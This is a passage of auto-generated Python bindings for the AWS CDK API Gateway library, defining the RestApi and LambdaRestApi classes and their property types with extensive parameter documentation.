props = RestApiProps(api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, clone_from=clone_from, cloud_watch_role=cloud_watch_role, deploy=deploy, deploy_options=deploy_options, description=description, domain_name=domain_name, endpoint_export_name=endpoint_export_name, endpoint_types=endpoint_types, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, parameters=parameters, policy=policy, rest_api_name=rest_api_name, retain_deployments=retain_deployments, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(RestApi, self, [scope, id, props])
@jsii.member(jsii_name="fromRestApiId")
@classmethod
def from_rest_api_id(cls, scope: aws_cdk.core.Construct, id: str, rest_api_id: str) -> "IRestApi":
"""
:param scope: -
:param id: -
:param rest_api_id: -
"""
return jsii.sinvoke(cls, "fromRestApiId", [scope, id, rest_api_id])
@jsii.member(jsii_name="addApiKey")
def add_api_key(self, id: str) -> "IApiKey":
"""Add an ApiKey.
:param id: -
"""
return jsii.invoke(self, "addApiKey", [id])
@jsii.member(jsii_name="addDomainName")
def add_domain_name(self, id: str, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None) -> "DomainName":
"""Defines an API Gateway domain name and maps it to this API.
:param id: The construct id.
:param options: custom domain options.
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
"""
options = DomainNameOptions(certificate=certificate, domain_name=domain_name, endpoint_type=endpoint_type)
return jsii.invoke(self, "addDomainName", [id, options])
@jsii.member(jsii_name="addModel")
def add_model(self, id: str, *, schema: "JsonSchema", content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, model_name: typing.Optional[str]=None) -> "Model":
"""Adds a new model.
:param id: -
:param props: -
:param schema: The schema to use to transform data to one or more output formats. Specify null ({}) if you don't want to specify a schema.
:param content_type: The content type for the model. You can also force a content type in the request or response model mapping. Default: -
:param description: A description that identifies this model. Default: None
:param model_name: A name for the model. Important If you specify a name, you cannot perform updates that require replacement of this resource. You can perform updates that require no or some interruption. If you must replace the resource, specify a new name. Default: If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the model name. For more information, see Name Type.
"""
props = ModelOptions(schema=schema, content_type=content_type, description=description, model_name=model_name)
return jsii.invoke(self, "addModel", [id, props])
@jsii.member(jsii_name="addRequestValidator")
def add_request_validator(self, id: str, *, request_validator_name: typing.Optional[str]=None, validate_request_body: typing.Optional[bool]=None, validate_request_parameters: typing.Optional[bool]=None) -> "RequestValidator":
"""Adds a new request validator.
:param id: -
:param props: -
:param request_validator_name: The name of this request validator. Default: None
:param validate_request_body: Indicates whether to validate the request body according to the configured schema for the targeted API and method. Default: false
:param validate_request_parameters: Indicates whether to validate request parameters. Default: false
"""
props = RequestValidatorOptions(request_validator_name=request_validator_name, validate_request_body=validate_request_body, validate_request_parameters=validate_request_parameters)
return jsii.invoke(self, "addRequestValidator", [id, props])
@jsii.member(jsii_name="addUsagePlan")
def add_usage_plan(self, id: str, *, api_key: typing.Optional["IApiKey"]=None, api_stages: typing.Optional[typing.List["UsagePlanPerApiStage"]]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, quota: typing.Optional["QuotaSettings"]=None, throttle: typing.Optional["ThrottleSettings"]=None) -> "UsagePlan":
"""Adds a usage plan.
:param id: -
:param props: -
:param api_key: ApiKey to be associated with the usage plan. Default: none
:param api_stages: API Stages to be associated which the usage plan. Default: none
:param description: Represents usage plan purpose. Default: none
:param name: Name for this usage plan. Default: none
:param quota: Number of requests clients can make in a given time period. Default: none
:param throttle: Overall throttle settings for the API. Default: none
"""
props = UsagePlanProps(api_key=api_key, api_stages=api_stages, description=description, name=name, quota=quota, throttle=throttle)
return jsii.invoke(self, "addUsagePlan", [id, props])
@jsii.member(jsii_name="arnForExecuteApi")
def arn_for_execute_api(self, method: typing.Optional[str]=None, path: typing.Optional[str]=None, stage: typing.Optional[str]=None) -> str:
"""
:param method: The method (default ``*``).
:param path: The resource path. Must start with '/' (default ``*``)
:param stage: The stage (default ``*``).
default
:default:
"*" returns the execute API ARN for all methods/resources in
this API.
return
:return: The "execute-api" ARN.
"""
return jsii.invoke(self, "arnForExecuteApi", [method, path, stage])
@jsii.member(jsii_name="urlForPath")
def url_for_path(self, path: typing.Optional[str]=None) -> str:
"""Returns the URL for an HTTP path.
Fails if ``deploymentStage`` is not set either by ``deploy`` or explicitly.
:param path: -
"""
return jsii.invoke(self, "urlForPath", [path])
@jsii.member(jsii_name="validate")
def _validate(self) -> typing.List[str]:
"""Performs validation of the REST API."""
return jsii.invoke(self, "validate", [])
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""The ID of this API Gateway RestApi."""
return jsii.get(self, "restApiId")
@property
@jsii.member(jsii_name="restApiRootResourceId")
def rest_api_root_resource_id(self) -> str:
"""The resource ID of the root resource.
attribute:
:attribute:: true
"""
return jsii.get(self, "restApiRootResourceId")
@property
@jsii.member(jsii_name="root")
def root(self) -> "IResource":
"""Represents the root resource ("/") of this API. Use it to define the API model:.
api.root.addMethod('ANY', redirectToHomePage); // "ANY /"
api.root.addResource('friends').addMethod('GET', getFriendsHandler); // "GET /friends"
"""
return jsii.get(self, "root")
@property
@jsii.member(jsii_name="url")
def url(self) -> str:
"""The deployed root URL of this REST API."""
return jsii.get(self, "url")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> typing.Optional["DomainName"]:
"""The domain name mapped to this API, if defined through the ``domainName`` configuration prop."""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="latestDeployment")
def latest_deployment(self) -> typing.Optional["Deployment"]:
"""API Gateway deployment that represents the latest changes of the API. This resource will be automatically updated every time the REST API model changes. This will be undefined if ``deploy`` is false."""
return jsii.get(self, "latestDeployment")
@property
@jsii.member(jsii_name="deploymentStage")
def deployment_stage(self) -> "Stage":
"""API Gateway stage that points to the latest deployment (if defined).
If ``deploy`` is disabled, you will need to explicitly assign this value in order to
set up integrations.
"""
return jsii.get(self, "deploymentStage")
@deployment_stage.setter
def deployment_stage(self, value: "Stage"):
return jsii.set(self, "deploymentStage", value)
class LambdaRestApi(RestApi, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.LambdaRestApi"):
"""Defines an API Gateway REST API with AWS Lambda proxy integration.
Use the ``proxyPath`` property to define a greedy proxy ("{proxy+}") and "ANY"
method from the specified path. If not defined, you will need to explicity
add resources and methods to the API.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, handler: aws_cdk.aws_lambda.IFunction, options: typing.Optional["RestApiProps"]=None, proxy: typing.Optional[bool]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param handler: The default Lambda function that handles all requests from this API. This handler will be used as a the default integration for all methods in this API, unless specified otherwise in ``addMethod``.
:param options: Default: - no options.
:param proxy: If true, route all requests to the Lambda Function. If set to false, you will need to explicitly define the API model using ``addResource`` and ``addMethod`` (or ``addProxy``). Default: true
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, When this option is enabled (by default), an AWS::ApiGateway::Deployment resource will automatically created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployStageOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = LambdaRestApiProps(handler=handler, options=options, proxy=proxy, api_key_source_type=api_key_source_type, binary_media_types=binary_media_types, clone_from=clone_from, cloud_watch_role=cloud_watch_role, deploy=deploy, deploy_options=deploy_options, description=description, domain_name=domain_name, endpoint_export_name=endpoint_export_name, endpoint_types=endpoint_types, fail_on_warnings=fail_on_warnings, minimum_compression_size=minimum_compression_size, parameters=parameters, policy=policy, rest_api_name=rest_api_name, retain_deployments=retain_deployments, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(LambdaRestApi, self, [scope, id, props])
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.RestApiProps", jsii_struct_bases=[ResourceOptions], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'clone_from': 'cloneFrom', 'cloud_watch_role': 'cloudWatchRole', 'deploy': 'deploy', 'deploy_options': 'deployOptions', 'description': 'description', 'domain_name': 'domainName', 'endpoint_export_name': 'endpointExportName', 'endpoint_types': 'endpointTypes', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'parameters': 'parameters', 'policy': 'policy', 'rest_api_name': 'restApiName', 'retain_deployments': 'retainDeployments'})
class RestApiProps(ResourceOptions):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, When this option is enabled (by default), an AWS::ApiGateway::Deployment resource will automatically created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployStageOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
if isinstance(deploy_options, dict): deploy_options = StageOptions(**deploy_options)
if isinstance(domain_name, dict): domain_name = DomainNameOptions(**domain_name)
self._values = {
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if clone_from is not None: self._values["clone_from"] = clone_from
if cloud_watch_role is not None: self._values["cloud_watch_role"] = cloud_watch_role
if deploy is not None: self._values["deploy"] = deploy
if deploy_options is not None: self._values["deploy_options"] = deploy_options
if description is not None: self._values["description"] = description
if domain_name is not None: self._values["domain_name"] = domain_name
if endpoint_export_name is not None: self._values["endpoint_export_name"] = endpoint_export_name
if endpoint_types is not None: self._values["endpoint_types"] = endpoint_types
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if rest_api_name is not None: self._values["rest_api_name"] = rest_api_name
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_source_type(self) -> typing.Optional["ApiKeySourceType"]:
"""The source of the API key for metering requests according to a usage plan.
default
:default: - Metering is disabled.
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream".
default
:default: - RestApi supports only UTF-8-encoded text payloads.
"""
return self._values.get('binary_media_types')
@property
def clone_from(self) -> typing.Optional["IRestApi"]:
"""The ID of the API Gateway RestApi resource that you want to clone.
default
:default: - None.
"""
return self._values.get('clone_from')
@property
def cloud_watch_role(self) -> typing.Optional[bool]:
"""Automatically configure an AWS CloudWatch role for API Gateway.
default
:default: true
"""
return self._values.get('cloud_watch_role')
@property
def deploy(self) -> typing.Optional[bool]:
"""Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes.
Since API Gateway deployments are immutable, When this option is enabled
(by default), an AWS::ApiGateway::Deployment resource will automatically
created with a logical ID that hashes the API model (methods, resources
and options). This means that when the model changes, the logical ID of
this CloudFormation resource will change, and a new deployment will be
created.
If this is set, ``latestDeployment`` will refer to the ``Deployment`` object
and ``deploymentStage`` will refer to a ``Stage`` that points to this
deployment. To customize the stage options, use the ``deployStageOptions``
property.
A CloudFormation Output will also be defined with the root URL endpoint
of this REST API.
default
:default: true
"""
return self._values.get('deploy')
@property
def deploy_options(self) -> typing.Optional["StageOptions"]:
"""Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled.
If ``deploy`` is disabled,
this value cannot be set.
default
:default: - Based on defaults of ``StageOptions``.
"""
return self._values.get('deploy_options')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of this API Gateway RestApi resource.
default
:default: - No description.
"""
return self._values.get('description')
@property
def domain_name(self) -> typing.Optional["DomainNameOptions"]:
"""Configure a custom domain name and map it to this API.
default
:default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
"""
return self._values.get('domain_name')
@property
def endpoint_export_name(self) -> typing.Optional[str]:
"""Export name for the CfnOutput containing the API endpoint.
default
:default: - when no export name is given, output will be created without export
"""
return self._values.get('endpoint_export_name')
@property
def endpoint_types(self) -> typing.Optional[typing.List["EndpointType"]]:
"""A list of the endpoint types of the API.
Use this property when creating
an API.
default
:default: - No endpoint types.
"""
return self._values.get('endpoint_types')
@property
def fail_on_warnings(self) -> typing.Optional[bool]:
"""Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource.
default
:default: false
"""
return self._values.get('fail_on_warnings')
@property
def minimum_compression_size(self) -> typing.Optional[jsii.Number]:
"""A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API.
When compression is enabled, compression or
decompression is not applied on the payload if the payload size is
smaller than this value. Setting it to zero allows compression for any
payload size.
default
:default: - Compression is disabled.
"""
return self._values.get('minimum_compression_size')
@property
def parameters(self) -> typing.Optional[typing.Mapping[str,str]]:
"""Custom header parameters for the request.
default
:default: - No parameters.
see
:see: https://docs.aws.amazon.com/cli/latest/reference/apigateway/import-rest-api.html
"""
return self._values.get('parameters')
@property
def policy(self) -> typing.Optional[aws_cdk.aws_iam.PolicyDocument]:
"""A policy document that contains the permissions for this RestApi.
default
:default: - No policy.
"""
return self._values.get('policy')
@property
def rest_api_name(self) -> typing.Optional[str]:
"""A name for the API Gateway RestApi resource.
default
:default: - ID of the RestApi construct.
"""
return self._values.get('rest_api_name')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""Retains old deployment resources when the API changes.
This allows
manually reverting stages to point to old deployments via the AWS
Console.
default
:default: false
"""
return self._values.get('retain_deployments')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'RestApiProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.LambdaRestApiProps", jsii_struct_bases=[RestApiProps], name_mapping={'default_cors_preflight_options': 'defaultCorsPreflightOptions', 'default_integration': 'defaultIntegration', 'default_method_options': 'defaultMethodOptions', 'api_key_source_type': 'apiKeySourceType', 'binary_media_types': 'binaryMediaTypes', 'clone_from': 'cloneFrom', 'cloud_watch_role': 'cloudWatchRole', 'deploy': 'deploy', 'deploy_options': 'deployOptions', 'description': 'description', 'domain_name': 'domainName', 'endpoint_export_name': 'endpointExportName', 'endpoint_types': 'endpointTypes', 'fail_on_warnings': 'failOnWarnings', 'minimum_compression_size': 'minimumCompressionSize', 'parameters': 'parameters', 'policy': 'policy', 'rest_api_name': 'restApiName', 'retain_deployments': 'retainDeployments', 'handler': 'handler', 'options': 'options', 'proxy': 'proxy'})
class LambdaRestApiProps(RestApiProps):
def __init__(self, *, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None, api_key_source_type: typing.Optional["ApiKeySourceType"]=None, binary_media_types: typing.Optional[typing.List[str]]=None, clone_from: typing.Optional["IRestApi"]=None, cloud_watch_role: typing.Optional[bool]=None, deploy: typing.Optional[bool]=None, deploy_options: typing.Optional["StageOptions"]=None, description: typing.Optional[str]=None, domain_name: typing.Optional["DomainNameOptions"]=None, endpoint_export_name: typing.Optional[str]=None, endpoint_types: typing.Optional[typing.List["EndpointType"]]=None, fail_on_warnings: typing.Optional[bool]=None, minimum_compression_size: typing.Optional[jsii.Number]=None, parameters: typing.Optional[typing.Mapping[str,str]]=None, policy: typing.Optional[aws_cdk.aws_iam.PolicyDocument]=None, rest_api_name: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None, handler: aws_cdk.aws_lambda.IFunction, options: typing.Optional["RestApiProps"]=None, proxy: typing.Optional[bool]=None):
"""
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
:param api_key_source_type: The source of the API key for metering requests according to a usage plan. Default: - Metering is disabled.
:param binary_media_types: The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream". Default: - RestApi supports only UTF-8-encoded text payloads.
:param clone_from: The ID of the API Gateway RestApi resource that you want to clone. Default: - None.
:param cloud_watch_role: Automatically configure an AWS CloudWatch role for API Gateway. Default: true
:param deploy: Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes. Since API Gateway deployments are immutable, When this option is enabled (by default), an AWS::ApiGateway::Deployment resource will automatically created with a logical ID that hashes the API model (methods, resources and options). This means that when the model changes, the logical ID of this CloudFormation resource will change, and a new deployment will be created. If this is set, ``latestDeployment`` will refer to the ``Deployment`` object and ``deploymentStage`` will refer to a ``Stage`` that points to this deployment. To customize the stage options, use the ``deployStageOptions`` property. A CloudFormation Output will also be defined with the root URL endpoint of this REST API. Default: true
:param deploy_options: Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled. If ``deploy`` is disabled, this value cannot be set. Default: - Based on defaults of ``StageOptions``.
:param description: A description of the purpose of this API Gateway RestApi resource. Default: - No description.
:param domain_name: Configure a custom domain name and map it to this API. Default: - no domain name is defined, use ``addDomainName`` or directly define a ``DomainName``.
:param endpoint_export_name: Export name for the CfnOutput containing the API endpoint. Default: - when no export name is given, output will be created without export
:param endpoint_types: A list of the endpoint types of the API. Use this property when creating an API. Default: - No endpoint types.
:param fail_on_warnings: Indicates whether to roll back the resource if a warning occurs while API Gateway is creating the RestApi resource. Default: false
:param minimum_compression_size: A nullable integer that is used to enable compression (with non-negative between 0 and 10485760 (10M) bytes, inclusive) or disable compression (when undefined) on an API. When compression is enabled, compression or decompression is not applied on the payload if the payload size is smaller than this value. Setting it to zero allows compression for any payload size. Default: - Compression is disabled.
:param parameters: Custom header parameters for the request. Default: - No parameters.
:param policy: A policy document that contains the permissions for this RestApi. Default: - No policy.
:param rest_api_name: A name for the API Gateway RestApi resource. Default: - ID of the RestApi construct.
:param retain_deployments: Retains old deployment resources when the API changes. This allows manually reverting stages to point to old deployments via the AWS Console. Default: false
:param handler: The default Lambda function that handles all requests from this API. This handler will be used as a the default integration for all methods in this API, unless specified otherwise in ``addMethod``.
:param options: Default: - no options.
:param proxy: If true, route all requests to the Lambda Function. If set to false, you will need to explicitly define the API model using ``addResource`` and ``addMethod`` (or ``addProxy``). Default: true
"""
if isinstance(default_cors_preflight_options, dict): default_cors_preflight_options = CorsOptions(**default_cors_preflight_options)
if isinstance(default_method_options, dict): default_method_options = MethodOptions(**default_method_options)
if isinstance(deploy_options, dict): deploy_options = StageOptions(**deploy_options)
if isinstance(domain_name, dict): domain_name = DomainNameOptions(**domain_name)
if isinstance(options, dict): options = RestApiProps(**options)
self._values = {
'handler': handler,
}
if default_cors_preflight_options is not None: self._values["default_cors_preflight_options"] = default_cors_preflight_options
if default_integration is not None: self._values["default_integration"] = default_integration
if default_method_options is not None: self._values["default_method_options"] = default_method_options
if api_key_source_type is not None: self._values["api_key_source_type"] = api_key_source_type
if binary_media_types is not None: self._values["binary_media_types"] = binary_media_types
if clone_from is not None: self._values["clone_from"] = clone_from
if cloud_watch_role is not None: self._values["cloud_watch_role"] = cloud_watch_role
if deploy is not None: self._values["deploy"] = deploy
if deploy_options is not None: self._values["deploy_options"] = deploy_options
if description is not None: self._values["description"] = description
if domain_name is not None: self._values["domain_name"] = domain_name
if endpoint_export_name is not None: self._values["endpoint_export_name"] = endpoint_export_name
if endpoint_types is not None: self._values["endpoint_types"] = endpoint_types
if fail_on_warnings is not None: self._values["fail_on_warnings"] = fail_on_warnings
if minimum_compression_size is not None: self._values["minimum_compression_size"] = minimum_compression_size
if parameters is not None: self._values["parameters"] = parameters
if policy is not None: self._values["policy"] = policy
if rest_api_name is not None: self._values["rest_api_name"] = rest_api_name
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
if options is not None: self._values["options"] = options
if proxy is not None: self._values["proxy"] = proxy
@property
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Adds a CORS preflight OPTIONS method to this resource and all child resources.
You can add CORS at the resource-level using ``addCorsPreflight``.
default
:default: - CORS is disabled
"""
return self._values.get('default_cors_preflight_options')
@property
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_integration')
@property
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified.
default
:default: - Inherited from parent.
"""
return self._values.get('default_method_options')
@property
def api_key_source_type(self) -> typing.Optional["ApiKeySourceType"]:
"""The source of the API key for metering requests according to a usage plan.
default
:default: - Metering is disabled.
"""
return self._values.get('api_key_source_type')
@property
def binary_media_types(self) -> typing.Optional[typing.List[str]]:
"""The list of binary media mime-types that are supported by the RestApi resource, such as "image/png" or "application/octet-stream".
default
:default: - RestApi supports only UTF-8-encoded text payloads.
"""
return self._values.get('binary_media_types')
@property
def clone_from(self) -> typing.Optional["IRestApi"]:
"""The ID of the API Gateway RestApi resource that you want to clone.
default
:default: - None.
"""
return self._values.get('clone_from')
@property
def cloud_watch_role(self) -> typing.Optional[bool]:
"""Automatically configure an AWS CloudWatch role for API Gateway.
default
:default: true
"""
return self._values.get('cloud_watch_role')
@property
def deploy(self) -> typing.Optional[bool]:
"""Indicates if a Deployment should be automatically created for this API, and recreated when the API model (resources, methods) changes.
Since API Gateway deployments are immutable, When this option is enabled
(by default), an AWS::ApiGateway::Deployment resource will automatically
created with a logical ID that hashes the API model (methods, resources
and options). This means that when the model changes, the logical ID of
this CloudFormation resource will change, and a new deployment will be
created.
If this is set, ``latestDeployment`` will refer to the ``Deployment`` object
and ``deploymentStage`` will refer to a ``Stage`` that points to this
deployment. To customize the stage options, use the ``deployStageOptions``
property.
A CloudFormation Output will also be defined with the root URL endpoint
of this REST API.
default
:default: true
"""
return self._values.get('deploy')
@property
def deploy_options(self) -> typing.Optional["StageOptions"]:
"""Options for the API Gateway stage that will always point to the latest deployment when ``deploy`` is enabled.
If ``deploy`` is disabled,
this value cannot be set.
default
